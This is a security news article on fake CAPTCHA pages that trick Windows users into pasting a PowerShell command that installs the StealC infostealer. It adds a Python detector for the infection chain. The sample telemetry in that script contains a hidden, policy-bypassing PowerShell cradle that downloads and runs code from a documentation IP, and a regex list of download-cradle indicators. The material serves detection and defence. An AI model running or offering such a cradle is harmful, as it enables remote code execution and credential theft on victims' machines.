Attackers are using counterfeit CAPTCHA verification pages to deliver StealC, an information-stealing malware that targets Windows systems. TechRepublic reported the campaign, citing a detailed analysis from LevelBlue.
The Mechanism of Deception
The attack begins when a user visits a compromised website that looks legitimate. There the visitor meets what appears to be a standard CAPTCHA check, which is in fact the trap. Malicious JavaScript embedded in the site displays a fake CAPTCHA page that asks the visitor to perform a short series of actions to prove they are human.
Unlike a conventional CAPTCHA, which asks the user to identify images, this one instructs the visitor to press Win + R (which opens the Windows Run dialog), then Ctrl + V, then Enter. The site's JavaScript has already placed a malicious PowerShell command on the clipboard, so pasting it into the Run dialog and pressing Enter executes it outside the browser, with the user's own privileges. The victim, not a browser exploit, launches the malware.
The Payload Unleashed
The pasted PowerShell command is the first stage. It connects to a remote server and downloads shellcode generated with the Donut tool, which converts executables and .NET assemblies into position-independent code that can be run directly from memory. Once loaded, that shellcode starts a 64-bit PE loader, which retrieves the final StealC payload and injects it into svchost.exe, a legitimate Windows service host process, so the stealer's activity is hidden inside what looks like normal system operation.
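The chain described above (a PowerShell command launched from the Run dialog, an outbound download, a payload landed in svchost.exe) leaves a recognisable trail in process telemetry. The following detector is an added example, not code from the LevelBlue report or from TechRepublic. The events are constructed, Sysmon-style records (process creation and network connection, trimmed to the fields the logic needs); the address 203.0.113.10 is a documentation IP; and the indicator patterns are assumptions about common download-cradle syntax, not signatures taken from the report. It also assumes the loader starts a fresh svchost.exe to inject into; that caveat is discussed after the code.

```python
"""Hunt for the fake-CAPTCHA -> Run dialog -> PowerShell -> svchost.exe chain.

Added example, not from the LevelBlue report. All events below are constructed
sample telemetry; the indicator regexes are assumptions, not report signatures.
"""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
SERVICES = r"C:\Windows\System32\services.exe"

# Constructed sample telemetry: kind "proc" = process creation, "net" = outbound connection.
SAMPLE_EVENTS = [
    {"kind": "proc", "pid": 4100, "ppid": 3200, "image": EXPLORER,
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    # The pasted command: explorer.exe is the parent because the Run dialog belongs to the shell.
    {"kind": "proc", "pid": 5120, "ppid": 4100, "image": PS, "parent": EXPLORER,
     "cmd": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://203.0.113.10/a.txt' -UseBasicParsing)\""},
    {"kind": "net", "pid": 5120, "image": PS, "dst": "203.0.113.10", "dport": 80},
    # Loader spawns its own svchost.exe to inject into (assumption; see note after the block).
    {"kind": "proc", "pid": 5310, "ppid": 5120, "image": SVCHOST, "parent": PS,
     "cmd": "svchost.exe -k netsvcs"},
    # Benign noise: a genuine service host, and an admin opening a console from the shell.
    {"kind": "proc", "pid": 900, "ppid": 700, "image": SVCHOST, "parent": SERVICES,
     "cmd": "svchost.exe -k DcomLaunch"},
    {"kind": "proc", "pid": 6000, "ppid": 4100, "image": PS, "parent": EXPLORER, "cmd": "powershell.exe"},
]

# Assumed cradle indicators: each is a common trait of clipboard-delivered PowerShell one-liners.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle": re.compile(
        r"\biwr\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|webclient|\bcurl\b|\bwget\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def basename(path):
    """Last path component, lower-cased, so image comparisons ignore directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmd):
    """Return the names of all indicators that match a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def ancestor_in(proc, procs, wanted):
    """Walk the parent chain and return the first ancestor pid found in `wanted`, else None."""
    ppid, seen = proc["ppid"], set()
    while ppid in procs and ppid not in seen:
        if ppid in wanted:
            return ppid
        seen.add(ppid)
        ppid = procs[ppid]["ppid"]
    return None


def detect(events):
    """Correlate the three stages and return one finding per suspicious process."""
    procs = {e["pid"]: e for e in events if e["kind"] == "proc"}
    net_by_pid = defaultdict(list)
    for e in events:
        if e["kind"] == "net":
            net_by_pid[e["pid"]].append(f"{e['dst']}:{e['dport']}")

    findings, cradle_pids = [], set()
    # Stage 1: PowerShell started by the shell (Run dialog) with cradle-like arguments.
    # Requiring two indicators keeps an admin's plain "powershell.exe" out of the results.
    for pid, p in procs.items():
        if basename(p["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        hits = score_command(p["cmd"])
        if basename(p["parent"]) == "explorer.exe" and len(hits) >= 2:
            cradle_pids.add(pid)
            findings.append({"stage": "run_dialog_cradle", "pid": pid,
                             "indicators": hits, "connections": net_by_pid.get(pid, [])})
    # Stage 2/3: svchost.exe should only ever be started by services.exe.
    for pid, p in procs.items():
        if basename(p["image"]) != "svchost.exe" or basename(p["parent"]) == "services.exe":
            continue
        findings.append({"stage": "rogue_svchost", "pid": pid, "parent": basename(p["parent"]),
                         "linked_cradle": ancestor_in(p, procs, cradle_pids)})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

In a live environment the inputs are Sysmon Event ID 1 (process creation) and Event ID 3 (network connection), or the equivalent EDR records. Two caveats matter. First, the rogue-parent check only fires if the loader starts a new svchost.exe; if it injects into an already-running service host, you need Event ID 8 (CreateRemoteThread) or Event ID 10 (ProcessAccess) showing a non-service process opening svchost.exe. Second, the command the victim pasted is recorded by Windows in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is worth collecting during triage even when process telemetry is gone.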
Consequences of Infection
Once running, StealC harvests sensitive data: browser credentials, email data, cryptocurrency wallet details, and system information. The consequences are serious, as the stolen data enables fraud, account hijacking, and lateral movement to other systems.
Compounding the risk, the multi-stage infection chain runs largely in memory. Little is written to disk, which hampers file-based detection and after-the-fact analysis, so infections can go unnoticed while data continues to be stolen.